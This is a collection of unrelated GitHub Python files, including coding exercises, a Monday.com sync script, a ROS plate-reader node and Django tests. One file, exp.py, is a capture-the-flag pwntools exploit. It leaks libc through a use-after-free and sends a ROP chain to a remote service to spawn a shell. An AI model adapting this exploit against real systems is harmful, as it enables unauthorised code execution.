'thread' in self.notifications[type]:\r\n # if already scheduled, then debounce (cancel and restart)\r\n self.notifications[type]['thread'].cancel()\r\n\r\n jobs['etls'].extend(self.notifications[type]['etls'])\r\n self.notifications[type] = {} \r\n \r\n self.notifications[type] = jobs\r\n\r\n def __debounce(type, message):\r\n try:\r\n self.notifications[type] = {}\r\n response = requests.post(self.__webhook, data=json.dumps({\"text\":message}))\r\n if response.status_code != 200:\r\n LOGGER.error(str(e))\r\n except Exception as e:\r\n LOGGER.error(str(e))\r\n\r\n self.notifications[type]['thread'] = Timer(self.__debounce_time if debounce == None else debounce, __debounce,args=[type, self.__getTypedMessage(type)] )\r\n self.notifications[type]['thread'].start()\r\n \r\n\r\nclass test(object):\r\n def on_post(self, req, resp):\r\n resp.status = falcon.HTTP_200\r\n data = {'status': 'unavailable service'}\r\n resp.body = json.dumps(data)\r\n\r\n def on_get(self, req, resp):\r\n resp.status = falcon.HTTP_200\r\n content = str(1/0)\r\n data = {'status': 'success', 'content': content, 'enum': '1'}\r\n resp.body = json.dumps(data)","repo_name":"rasyid-abe/etl_datamart","sub_path":"notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"40350304065","text":"\"\"\"\nYou are given a set A and n other sets.\nYour job is to find whether set A is a strict superset of each of the N sets.\nPrint True, if A is a strict superset of each of the N sets. Otherwise, print False.\nA strict superset has at least one element that does not exist in its subset.\n\nExample\nSet ([1,3,4]) is a strict superset of set ([1,3]).\nSet ([1,3,4]) is not a strict superset of set ([1,3,4]).\nSet ([1,3,4]) is not a strict superset of set ([1,3,5]).\n\nInput Format\nThe first line contains the space separated elements of set A.\nThe second line contains integer n, the number of other sets.\nThe next n lines contains the space separated elements of the other sets.\n\nOutput Format\nPrint True if set A is a strict superset of all other N sets. Otherwise, print False.\n\nSample Input:\n1 2 3 4 5 6 7 8 9 10 11 12 23 45 84 78\n2\n1 2 3 4 5\n100 11 12\n\nSample Output:\nFalse\n\nExplanation:\nSet A is the strict superset of the set ([1,2,3,4,5]) but not of the set ([100,11,12]) because 100 is not in set A.\nHence, the output is False.\n\"\"\"\n\"\"\"\nExplanation of the solution code:\nIn Python, the > operator is used to check if a set is a strict superset of another set. \nIf all elements of the second set are in the first set, \nand the first set has at least one element that the second set doesn't have, \nA > B returns True. Otherwise, it returns False.\n\"\"\"\nA = set(map(int, input().split()))\nnum_other_sets = int(input())\n\nis_strict_superset = True\nfor _ in range(num_other_sets):\n other_set = set(map(int, input().split()))\n if not (A > other_set):\n is_strict_superset = False\n break\n\nprint(is_strict_superset)\n","repo_name":"CihatAcar/HackerRank-Python-Exercises","sub_path":"Sets/check_strict_superset.py","file_name":"check_strict_superset.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"17872540326","text":"# Вывести кол-во гласных букв в предложекние введеных пользователем.\nvowels = ['a', 'e', 'i', 'o', 'u'] # список гласных букв\nword = input(\"Provide a word to search for vowels: \") # запрос предложения, слова\nfound = {} # словарь\n\nfound['a'] = 0\nfound['e'] = 0\nfound['i'] = 0\nfound['o'] = 0\nfound['u'] = 0\n\nfor letter in word: # перебор букв в слове\n\tif letter in vowels: # если буква глассная\n\t\tfound[letter] += 1 # +1 буква\n\nfor k, v in sorted(found.items()): # ключ и значение \n\tprint(k, 'was found', v, 'time(s).') # буква ее кол-во\n","repo_name":"Lumaks42/codePythonStart","sub_path":"vowels_improvement.py","file_name":"vowels_improvement.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"38056070411","text":"class Solution:\n def isIsomorphic(self, s: str, t: str) -> bool:\n print(f\"{s} - {t}\")\n replacements = {}\n if len(s) != len(t):\n return False\n for s_char, t_char in zip(s, t):\n print(f\"{s_char} \", end=\"\")\n if s_char in replacements:\n print(f\"found replacement {replacements[s_char]}\")\n if replacements[s_char] != t_char:\n print(\"False\")\n return False\n else:\n if t_char not in replacements.values():\n print(f\"no replacement, adding {s_char}: {t_char}\")\n replacements[s_char] = t_char\n else:\n print(f\"{t_char} already used as replacement\")\n print(\"False\")\n return False\n print(\"True\")\n return True\n\n\ninputs = [(\"egg\", \"add\"), (\"badc\", \"baba\"), (\"foo\", \"bar\"), (\"bbbaaaba\", \"aaabbbba\")]\nexpected = [True, False, False, False]\n\nresults = []\nfor i in inputs:\n sol = Solution()\n results.append(sol.isIsomorphic(i[0], i[1]))\n\nprint(expected)\nprint(results)\nprint(expected == results) \n\n","repo_name":"woodroww/algorithms","sub_path":"leetcode/isomorphic_strings_205.py","file_name":"isomorphic_strings_205.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"4141631606","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n# File : lmdb-single.py\n# Author : Jiayuan Mao\n# Email : maojiayuan@gmail.com\n# Date : 01/17/2023\n#\n# This file is part of Jacinle.\n# Distributed under terms of the MIT license.\n\nfrom jacinle.storage.kv.lmdb import LMDBKVStore\n\n\ndef main():\n kv = LMDBKVStore('/tmp/test_1.lmdb', readonly=False)\n\n with kv.transaction():\n kv['a'] = 1\n kv['b'] = 2\n\n assert 'a' in kv and kv['a'] == 1\n assert 'b' in kv and kv['b'] == 2\n assert 'c' not in kv\n\n for k in kv.keys():\n print(k, kv[k])\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"vacancy/Jacinle","sub_path":"examples/kv-lmdb/lmdb-single.py","file_name":"lmdb-single.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"16"}
+{"seq_id":"22925740294","text":"# Monday and Local SQL server intagration\n# Written by: Anthony Bradt 613-986-0029\n# Requested by: Victoria Hurrell, Hated by: Christan Slain\n\nimport requests\nimport json\nimport pyodbc\nimport pandas as pd\nimport time\n\napiKey = \"XXX\"\napiUrl = \"https://api.monday.com/v2\"\nheaders = {\"Authorization\": apiKey}\n\ncnxn = pyodbc.connect(\"Driver={SQL Server Native Client 11.0};\"\n \"Server=XXX;\"\n \"Database=XXX;\"\n \"Trusted_Connection=yes;\")\n\n#Add SQL Read Query here: \n#SQLQR = \"SELECT\tstt.sttDescription as 'Status' ,ord.ordSchedShipDate ,ord.ordCustRequestDate as 'Production Completion'\t,sales.ordavValue as 'Designer'\t,ord.ordPONumber as 'Sales Order 3'\t,cust.venCompanyName as 'Customer Name',ord.ordDescription FROM dbo.Orders ord LEFT JOIN dbo.OrderStatuses stt on stt.sttID = ord.sttID LEFT JOIN dbo.OrderAttributeValues sales on sales.ordID = ord.ordID AND sales.atbID = 64 LEFT JOIN dbo.Organizations cust on cust.venID = ord.venID WHERE ord.ordCreatedDateTime > '2019-01-01' AND cust.vencompanyName NOT LIKE 'Test Customer' AND ord.ordPONumber NOT LIKE '0000%' AND sales.ordavValue = 'Heather Tardioli' \"\n\n#Must match Desingers names with Board ID\nDesigners = [\"Elnaz Shahrokhi\" ,\"Kaitlyn North\" ,\"Heather Tardioli\" ,\"Wael Bakr\" ,\"Aviva Ben-Choreen\" ,\"Janet Spencer\" ,\"Karley Scrivens\" ,\"Kimberly Silcox\" ,\"Ola Elmaghraby\" ,\"Sarah Clifford\" ,\"Victoria Campbell\" ,\"Caroline Castrucci\" ,\"Corey Laurysen\" ,\"Zeina Agha\", \"Jinan Al-Ani\"]\nBoardID = [\"840778743\" ,\"840784633\" ,\"840780676\" ,\"840788263\" ,\"701886327\" ,\"840782335\" ,\"840785291\" ,\"840786638\" ,\"840787425\" ,\"840792017\" ,\"840789036\" ,\"840785983\" ,\"845011609\" ,\"840791247\", \"840783457\"]\nStats = [\"Cancelled\",\"Shipped\",\"Completed\",\"Available for Confirmation\",\"Available to Schedule\",\"Blank5\",\"Confirmation Notification\",\"Copy\",\"Design Import\",\"In Production\",\"Invoiced\",\"Left CP\",\"PO Needed\",\"Scheduled\",\"Review for Scheduling\",\"Service Schedulable\",\"Ready to Ship\",\"Ready to Ship CP\",\"Material List Available\",\"Nested\",\"Left Carleton Place\"]\n#Hard coded Status, order matters very much, must match monday's side\nprint(len(Stats))\n\n\"\"\" \n'Cancelled', 'value': '{\"index\":0}'\n'Shipped', 'value': '{\"index\":1}'},\n'Completed', 'value': '{\"index\":2}'},\n'Available for Confirmation', 'value': '{\"index\":3}'}\n'Available to Schedule', 'value': '{\"index\":4}'},\n'Confirmation Notification', 'value': '{\"index\":6}'}\n'Copy', 'value': '{\"index\":7}'}\n'Design Import', 'value': '{\"index\":8}'},\n'In Production', 'value': '{\"index\":9}'}\n'Invoiced', 'value': '{\"index\":10}'},\n'Left CP', 'value': '{\"index\":11}'},\n'PO Needed', 'value': '{\"index\":12}'}\n'Scheduled', 'value': '{\"index\":13}'}\n'Review For Scheduling', 'value': '{\"index\":14}'}\n\"\"\"\n \ndef SQLRead(Des): #Pass Designer name to SQL, Return Full SQL read\n try:\n SQLQR = \"SELECT\tstt.sttDescription as 'Status' ,ord.ordSchedShipDate ,ord.ordCustRequestDate as 'Production Completion'\t,sales.ordavValue as 'Designer'\t,ord.ordPONumber as 'Sales Order 3'\t,cust.venCompanyName as 'Customer Name',ord.ordDescription, processor.ordavValue as 'Processor', ord.ordOrderDate FROM dbo.Orders ord LEFT JOIN dbo.OrderStatuses stt on stt.sttID = ord.sttID LEFT JOIN dbo.OrderAttributeValues sales on sales.ordID = ord.ordID AND sales.atbID = 64 LEFT JOIN dbo.OrderAttributeValues processor on processor.ordID = ord.ordID AND processor.atbID = 75 LEFT JOIN dbo.Organizations cust on cust.venID = ord.venID WHERE ord.ordCreatedDateTime > DATEADD(year,-1,GETDATE()) AND cust.vencompanyName NOT LIKE 'Test Customer' AND ord.ordpoNumber NOT LIKE '%-D' AND ord.ordPONumber NOT LIKE '0000%' AND sales.ordavValue = '\"\n SQLQR += Des\n SQLQR += \"'\"\n df = pd.read_sql(SQLQR, cnxn)\n return df\n except: #If Failed, Try again. Bandain for timeout SQL Requests\n print(\"SQL failed\")\n SQLRead(Des)\n \ndef STRClean(CleanME): #Removes Extra char on Strings\n CleanME = str(CleanME)\n CleanME = CleanME[2:-2]\n return CleanME\n \ndef CheckSTR(ID,Data): \n Data = str(Data)\n ID = str(ID)\n ID += '\"'\n #print(ID)\n if ID in Data:\n return 1\n else:\n return 0\n \ndef CheckSTROld(ID,Data):\n Data = str(Data)\n ID = str(ID)\n #print(ID)\n if ID in Data:\n return 1\n else:\n return 0\n\ndef MonQuery(BID): #Takes Monday Board ID, returns that boards items \n #'query {boards (ids: 695573207){items{name column_values{title id value}}}}'\n query = 'query {boards (ids:'\n query += BID\n query += '){items{name id column_values{title id value}}}}'\n data = {'query' : query}\n r = requests.post(url=apiUrl, json=data, headers=headers) # make request\n x = r.json()\n # print(r)\n return x\n\ndef SQLToMon(FullQ,SID,BID): #Takes SQL Data, breakes in into parts and passes it to Funtion WriteMon\n Status = FullQ['Status'] #Sperates each line item\n ShipDate = FullQ['ordSchedShipDate']\n ProdComp = FullQ['Production Completion']\n Design = FullQ['Designer']\n Item = FullQ['Customer Name']\n Descrip = FullQ['ordDescription']\n OrdDate = FullQ['ordOrderDate']\n Process = FullQ['Processor']\n Process = STRClean(Process.values) #Cleans each item \n Status = STRClean(Status.values)\n ShipDate = DateClean(ShipDate) #Dates and STR use diffrent Clean functions\n ProdComp = DateClean(ProdComp)\n OrdDate = DateClean(OrdDate)\n Design = STRClean(Design.values)\n Item = STRClean(Item.values)\n Descrip = STRClean(Descrip.values)\n print(Item,SID,Status,Descrip,ShipDate,ProdComp,Design,BID,OrdDate,Process)\n WriteMon(Item,SID,Status,Descrip,ShipDate,ProdComp,Design,BID,OrdDate,Process)\n return 0\n \ndef DateClean(Date):\n Date = str(Date)\n Date = Date.split(\"Name:\",1)[0]\n Date = Date[4:]\n Date = Date.replace(\" \",\"\")\n Date = Date.replace(\"\\n\",\"\")\n return Date\n\ndef WriteMon(Item,SID,Status,Descrip,ShipDate,ProdComp,Design,BID,OrdDate,Process):\n IID = MakeItem(BID,Item)\n IID = CleanID(str(IID))\n print(IID)\n ChangeItemValues(BID,IID,\"text_1\",DoubleDump(SID))\n ChangeItemValues(BID,IID,\"text\",DoubleDump(Descrip))\n ChangeItemValues(BID,IID,\"text7\",DoubleDump(Process))\n ChangeItemValues(BID,IID,\"text1\",DoubleDump(Design))\n ChangeItemValues(BID,IID,\"date\",DateDump(ProdComp))\n ChangeItemValues(BID,IID,\"date4\",DateDump(ShipDate))\n ChangeItemValues(BID,IID,\"date1\",DateDump(OrdDate))\n print(Status)\n for z in range(len(Stats)):\n if CheckSTROld(Stats[z],Status):\n ChangeItemValues(BID,IID,\"status\",StatDump(z))\n \n \n # ChangeItemValues(BID,IID,\n return 0\n \ndef StatDump(Value):\n VStat = '{\"index\":%s}'%(Value)\n VStat = json.dumps(VStat)\n return VStat\n \ndef DoubleDump(Value):\n Value = json.dumps(json.dumps(Value))\n return Value\n \ndef DateDump(Value):\n VDate = '{\"date\": \"%s\"}'%(Value)\n VDate = json.dumps(VDate)\n return VDate\n \ndef MakeItem(ID,Item):\n Item = str(Item)\n query = 'mutation { create_item (board_id:'\n query += ID\n query += ', group_id: \"topics\", item_name:\"'\n query += Item\n query += '\") { id } }'\n data = {'query' : query}\n r = requests.post(url=apiUrl, json=data, headers=headers) # make request\n print (r)\n return (r.json());\n # return r\n\ndef CleanID(NotCleanID):\n print(\"To be Cleaned:\" + NotCleanID)\n NotCleanID = NotCleanID.split(\"'id':\",1)[1]\n NotCleanID = NotCleanID.split(\"}}\",1)[0]\n NotCleanID = NotCleanID.replace(\"'\",\"\")\n NotCleanID = NotCleanID.replace(\" \",\"\")\n return NotCleanID\n \ndef CleanItemID(ItemID):\n ItemID = ItemID.split(\"'id':\",1)[1]\n ItemID = ItemID.split(\"'column_values':\",1)[0]\n ItemID = ItemID.replace(\"'\",\"\")\n ItemID = ItemID.replace(\",\",\"\")\n ItemID = ItemID.replace(\" \",\"\")\n return ItemID\n \n\"\"\"\ntext_1 - sales order#\ntext - Description\nstatus - Production status\ndate4 - Sched Ship date\ndate - Production completion\nperson - Desginers\n\"\"\"\n\ndef ChangeItemValues(BID,IID,CID,Value):\n try:\n print (\"Flag: 0\")\n query = str('mutation {change_column_value(board_id:%s, item_id:%s,column_id:\"%s\",value:%s){id}}'%(BID,IID,CID,Value))\n print (query)\n data = {'query' : query}\n print (\"Flag: 1\")\n r = requests.post(url=apiUrl, json=data, headers=headers, timeout=240) # make request\n print (\"Flag: 2\")\n return (r.json());\n except:\n print(\"failed\")\n print(BID)\n print(IID)\n print(CID)\n print(Value)\n\n\"\"\"\ndef FindWon(json_data):\n data_dict = dict(json_data)\n won_list = []\n if (\"data\" in data_dict.keys()):\n dict1 = data_dict[\"data\"]\n if (\"boards\" in dict1.keys()):\n for item in dict1[\"boards\"]:\n if (\"items\" in item.keys()):\n for i in item[\"items\"]:\n if (\"column_values\" in i.keys()):\n for ix in i[\"column_values\"]:\n if (\"value\" in ix.keys()):\n if (\"61557-D\" in ix[\"value\"]):\n won_list.append(i)\n return (won_list);\nprint(type(MonQuery(\"695573207\")))\nprint(FindWon(MonQuery(\"695573207\")))\n\"\"\"\n\nlvals = []\ndef rec_won(data,key,reg,depth): #Majic Sause, This burger aint the same without it. Credits:Kyle Lawrynuik \n flag = []\n new_flag = []\n global lvals\n if isinstance(data, dict):\n try:\n if (reg == str(data[key])):\n flag.append(depth)\n except KeyError as e:\n pass\n for element in data:\n for el in rec_won(data[element],key,reg,depth):\n flag.append(el)\n if isinstance(data, list):\n for element in data:\n for el in rec_won(element,key,reg,depth):\n flag.append((el))\n for element in flag:\n if(element>0):\n new_flag.append(element-1)\n if(element==0):\n #print(data)\n lvals.append(data)\n return new_flag\n\n\"\"\"\ninput(\"part 0 -- Testing \")\nlvals = []\ndata = MonQuery(\"695573207\")\nprint(type(data))\n#print(data)\nsalesOrderID = \"63020\"\nsalesOrderID = json.dumps(salesOrderID)\nrec_won(data=dict(data),key=\"value\",reg=salesOrderID,depth=2)\nprint(lvals)\n\n\"\"\"\n\n\n#Main \ninput(\"Part 1 -- Add missing items to monday\")\ncount = 0\nfor x in Designers: #Run through for each designer\n print(x)\n # input(\"Enter to continue\")\n time.sleep(60)\n df = SQLRead(x) #Runs preset SQL Query for the designers name \n print(df) #Prints SQL Query using pandas\n print(BoardID[count]) \n MonData = MonQuery(BoardID[count])#Takes hard coded desingers board ID and returns Monday Items \n print(MonData)\n \n for y in df.index:#For every item returned by the SQL Query\n time.sleep(1)\n TestDF = df.loc[[y]] #Pass just one item at a time\n print(TestDF)\n SalesDF = TestDF['Sales Order 3'] #Isolate Sales Order number\n SalesID = STRClean(SalesDF.values)#Clean Sales Order number\n print(SalesID)\n \n if CheckSTR(SalesID,MonData) == 0: #Check if Sales Order number is anywhere in the monday board\n print(\"passing SQL to Monday\")\n print(df.loc[y])\n SQLToMon(df.loc[[y]],SalesID,BoardID[count]) #Passes SQL item to be written to Monday.com \n \n else: #Item already exist in monday\n lvals = [] #Preforms the same as SQLToMon, should be a function of its own\n SalesID = json.dumps(SalesID)\n rec_won(data=dict(MonData),key=\"value\",reg=SalesID,depth=2)\n ItemID = CleanItemID(str(lvals))\n Status = TestDF['Status']\n Status = STRClean(Status.values)\n ProdDate = TestDF['Production Completion']\n SchedDate = TestDF['ordSchedShipDate']\n SchedDate = DateClean(SchedDate)\n ProdDate = DateClean(ProdDate)\n for z in range(len(Stats)):\n if CheckSTROld(Stats[z],Status):\n ChangeItemValues(BoardID[count],ItemID,\"status\",StatDump(z))\n ChangeItemValues(BoardID[count],ItemID,\"date\",DateDump(ProdDate))\n ChangeItemValues(BoardID[count],ItemID,\"date4\",DateDump(SchedDate))\n print(\"update\")\n print(StatDump(z)) \n \n count += 1\n \ninput(\"Finished\")\n","repo_name":"aajjbb613/Insight_to_Monday","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":12526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70886135047","text":"import setuptools\n\n# Открытие README.md и присвоение его long_description.\nwith open(\"README.md\", \"r\") as fh:\n\tlong_description = fh.read()\n\n# Определение requests как requirements для того, чтобы этот пакет работал. Зависимости проекта.\nrequirements = [\"requests<=2.21.0\", \"selenium\"]\n\n# Функция, которая принимает несколько аргументов. Она присваивает эти значения пакету.\nsetuptools.setup(\n\tname=\"dnevniklib\",\n\tversion=\"1.0\",\n\tauthor=\"Ivan Kriventsev\",\n\tauthor_email=\"dirtyhornet277@outlook.com\",\n\tdescription=\"Library for automated work with dnevnik.mos.ru\",\n\n\tlong_description=long_description,\n\tlong_description_content_type=\"text/markdown\",\n\turl=\"https://github.com/dirtyhornet277/dnevniklib\",\n\tpackages=setuptools.find_packages(),\n\tclassifiers=[\n\t],\n\tpython_requires='>=3.6',\n)\n","repo_name":"DnevnikLib/dnevniklib","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"28516499015","text":"#!/usr/bin/env python3\n\n# import libraries\nimport rospy\nimport cv2\nimport numpy as np\nimport car_plate_number_test\nimport sensor_msgs\nfrom geometry_msgs.msg import PoseStamped\nfrom test_pkg.msg import CarData\nfrom cv_bridge import CvBridge\nimport cv2\n\nclass License_Detect:\n def __init__(self):\n print(\"Start\")\n rospy.init_node(\"car_plate_number\")\n rospy.Subscriber(\"/camera/rgb/image_raw\",sensor_msgs.msg.Image,self.ImageCallback)\n rospy.Subscriber('/move_base_simple/goal',PoseStamped,self.start)\n self.car_msg_pub = rospy.Publisher('/Car_Data',CarData,queue_size=1)\n self.image = None\n self.oldval = 0\n self.bridge = CvBridge()\n rospy.spin()\n \n def start(self,data):\n print(\"success\")\n car_number , img ,detected= car_plate_number_test.find_number()\n # print(car_number)\n\n carmsg = CarData()\n\n if detected:\n carmsg.car_number_plate = car_number\n carmsg.height = img.shape[0]\n carmsg.width = img.shape[1]\n carmsg.data = self.bridge.cv2_to_imgmsg(img).data\n carmsg.detected = detected\n self.car_msg_pub.publish(carmsg)\n else:\n carmsg.car_number_plate = \" \"\n carmsg.detected = detected\n\n self.car_msg_pub.publish(carmsg)\n\n\n# 집에 가고 싶다...\n\n def ImageCallback(self, data):\n # print(data.height) # value : 1080\n # print(data.width) # value : 1920\n # print(data.encoding) # value : rgb8\n # print(data.is_bigendian) # value : 0\n # print(data.step) # value : 5760\n bridge = CvBridge()\n # cv_image = bridge.imgmsg_to_cv2(image_message, desired_encoding='passthrough')\n img_ori = bridge.imgmsg_to_cv2(data,'bgr8')\n # print(img_ori.shape)\n self.image = cv2.resize(img_ori, (640, 480), interpolation=cv2.INTER_CUBIC)\n # self.image = img_ori.copy()\n # print(self.image[0][0]) # row : 1080 col : 1920\n # print(np.sum(self.image))\n cur = np.sum(self.image)\n print(cur - self.oldval if cur > self.oldval else 0)\n self.oldval = cur\n\n\n\n cv2.imshow(\"Image window\", self.image)\n cv2.waitKey(3)\n # print(car_plate_number_test.find_number(data))\n \n \nif __name__ ==\"__main__\":\n start = License_Detect()\n ","repo_name":"chunggilan/Autonomous-Multi-Robot-Parking-System","sub_path":"test_pkg/scripts/car_plate_ros.py","file_name":"car_plate_ros.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"}
+{"seq_id":"27893530174","text":"#!/usr/bin/env python\n\nfrom pwn import *\n\ncontext.log_level = \"debug\"\n\nelf = \"./hacker_system_ver2\"\n\nunsorted_bin_off = 0x3c4b78\nsystem_off = 0x45390\nbin_sh_off = 0x18cd57\n\npop_rdi_ret = 0x400fb3\n\n#p = process(elf)\np = remote(\"111.230.149.72\", 10008)\n\ndef add(name, age, length, intro):\n p.recvuntil(\"> \")\n p.sendline(\"1\")\n p.recvuntil(\"input the hacker's name:\")\n p.sendline(name)\n p.recvuntil(\"input the hacker's age:\")\n p.sendline(str(age))\n p.recvuntil(\"input the introduce's length:\")\n p.sendline(str(length))\n p.recvuntil(\"input the intro:\")\n p.send(intro)\n\ndef printh(length, name):\n p.recvuntil(\"> \")\n p.sendline(\"2\")\n p.recvuntil(\"input name length:\")\n p.sendline(str(length))\n p.recvuntil(\"input hacker's name:\")\n p.send(name)\n \ndef delete(length, name):\n p.recvuntil(\"> \")\n p.sendline(\"3\")\n p.recvuntil(\"input name length:\")\n p.sendline(str(length))\n p.recvuntil(\"input hacker's name:\")\n p.send(name)\n\n\nadd(\"A\", 1, 0x100, \"\\n\")\nadd(\"A\", 1, 0x3, \"123\")\n\ndelete(2, \"A\\n\")\n\nprinth(2, \"A\\n\")\n\np.recvuntil(\"intro:\")\nlibc_base = u64(p.recv(6).ljust(8, \"\\x00\"))-unsorted_bin_off\nlog.info(\"libc_base: \"+hex(libc_base))\n\nsystem_addr = libc_base+system_off\nbin_sh_addr = libc_base+bin_sh_off\n\npayload = p8(0)*0x38\npayload += p64(pop_rdi_ret)\npayload += p64(bin_sh_addr)\npayload += p64(system_addr)\nprinth(0x50, payload)\n\np.interactive()\n","repo_name":"0x3f97/pwn","sub_path":"hgame2018/hacker-system2/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"16"}
+{"seq_id":"1258608152","text":"soma = 0\n\nnum1 = int(input())\nnum2 = int(input())\n\nif num1 >= num2:\n maior = num1\n menor = num2\nelse:\n maior = num2\n menor = num1\n\nif maior % 2 == 0:\n maior -= 1\nelse:\n maior -= 2\n\nwhile maior > menor:\n soma += maior\n maior -= 2\n\nprint(soma)","repo_name":"niverton-felipe/URI_PYTHON","sub_path":"1071.py","file_name":"1071.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"74408158087","text":"from django.urls import reverse\nfrom rest_framework.test import APITestCase\nfrom rest_framework import status\nfrom django.contrib.auth.models import User\nfrom django.db import transaction\n\nclass PostViewTest(APITestCase):\n def setUp(self):\n self.register_url = reverse('register')\n self.post_list_url = reverse('posts')\n self.user_data = {\n 'username': 'testuser',\n 'email': 'test@example.com',\n 'password': 'testpassword'\n }\n\n\n # Step 1: Create a user by hitting the registration endpoint\n response = self.client.post(self.register_url, self.user_data, format='json')\n # print(response.data)\n # self.assertEqual(response.data['status'], status.HTTP_201_CREATED)\n self.token = response.data['data']['token']\n \n self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {self.token}')\n\n def create_single_post(self):\n post_data = {'title': 'title', 'body': 'body'}\n\n response = self.client.post(self.post_list_url, post_data, format='json')\n return response\n\n def create_post(self):\n for i in range(5):\n post_data = {'title': f'title {i+1}', 'body': f'body {i+1}'}\n\n response = self.client.post(self.post_list_url, post_data, format='json')\n\n def test_create_posts(self):\n for i in range(5):\n post_data = {'title': f'title {i+1}', 'body': f'body {i+1}'}\n\n response = self.client.post(self.post_list_url, post_data, format='json')\n \n response = self.client.get(self.post_list_url)\n # self.assertEqual(response.data['status'], status.HTTP_200_OK)\n self.assertEqual(len(response.data['data']), 5)\n\n\n def test_get_all_posts(self):\n self.create_post()#\n response = self.client.get(self.post_list_url)\n self.assertEqual(response.data['status'], status.HTTP_200_OK)\n self.assertEqual(len(response.data['data']), 5)\n\n def test_get_single_post(self):\n self.create_post()\n response = self.client.get(\"/api/posts/1\")\n self.assertEqual(response.data['status'], status.HTTP_200_OK)\n\n def test_update_post(self):\n self.create_post()\n response = self.client.put(\"/api/posts/1\",{'title':'updated title','body':'updated body'},format='json')\n self.assertEqual(response.data['status'], status.HTTP_200_OK)\n\n def test_delete_post(self):\n self.create_post()\n response = self.client.delete(\"/api/posts/1\")\n self.assertEqual(response.data['status'], status.HTTP_204_NO_CONTENT)\n \n","repo_name":"sarangkkl/blog_api","sub_path":"blog/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"35687358540","text":"import csv\nimport re\nimport string\nfrom time import sleep\n\nfrom nltk import PorterStemmer\nfrom nltk.corpus import stopwords\n\n\ndef preprocess_emotions_script():\n print()\n print(\"*** ESECUZIONE IN BACKGROUND >>> Preprocessing delle emozioni in corso...\")\n sleep(0.2)\n # # # TOKENIZZAZIONE # # #\n emoticons_str = r\"\"\"\n (?:\n [:=;] # Eyes\n [oO\\-]? # Nose (optional)\n [D\\)\\]\\(\\]/\\\\OpP] # Mouth\n )\"\"\"\n\n regex_str = [\n emoticons_str,\n r'<[^>]+>', # HTML tags\n r'(?:@[\\w_]+)', # @-mentions\n r\"(?:\\#+[\\w_]+[\\w\\'_\\-]*[\\w_]+)\", # hash-tags\n r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-f][0-9a-f]))+', # URLs\n\n r'(?:(?:\\d+,?)+(?:\\.?\\d+)?)', # numbers\n r\"(?:[a-z][a-z'\\-_]+[a-z])\", # words with - and '\n r'(?:[\\w_]+)', # other words\n r'(?:\\S)' # anything else\n ]\n\n tokens_re = re.compile(r'(' + '|'.join(regex_str) + ')', re.VERBOSE | re.IGNORECASE)\n emoticon_re = re.compile(r'^' + emoticons_str + '$', re.VERBOSE | re.IGNORECASE)\n\n def tokenize(s):\n return tokens_re.findall(s)\n\n def preprocess(s, lowercase=False):\n tokens = tokenize(s)\n # if lowercase:\n # tokens = [token if emoticon_re.search(token) else token.lower() for token in tokens]\n return tokens\n\n punteggiatura = list(string.punctuation) ### La punteggiatura la teniamo in conto\n stop_words = stopwords.words('english') + punteggiatura\n ps = PorterStemmer()\n # # # ------------- # # #\n\n with open('text_emotion.csv', 'r') as emotion_file:\n reader = csv.reader(emotion_file, delimiter=',')\n for row in reader:\n content = row[3]\n emotion = row[1]\n # print(line)\n # print()\n content = re.sub(r\"(?:\\@|https?\\://)\\S+\", \"\", content)\n # content = re.sub(r\"http\\S+\", \"\", content)\n # print(\"TOKENIZZAZIONE TWEET [\",i,\"]\")\n # print(\"TESTO TWEET > \", preprocess(tweet)) # stampa dei token del testo dei tweets\n # print(\"\\n\")\n # i = i + 1\n # print(content)\n\n # lista dei termini senza le stop words (SW)\n content_prepro = [ps.stem(term) + \" \" for term in preprocess(content) if term not in stop_words]\n\n # print(content_prepro)\n # print()\n # print(emotion)\n\n with open('text_emotion_prepro.csv', 'a+', encoding='utf8') as file:\n file.writelines(content_prepro)\n file.writelines(\",\")\n file.writelines(emotion)\n file.write(\"\\n\")\n print(\"*** Completato! Puoi procedere...\\n\")","repo_name":"Andry92/emotional-film-advice","sub_path":"Preprocess_Emotions.py","file_name":"Preprocess_Emotions.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
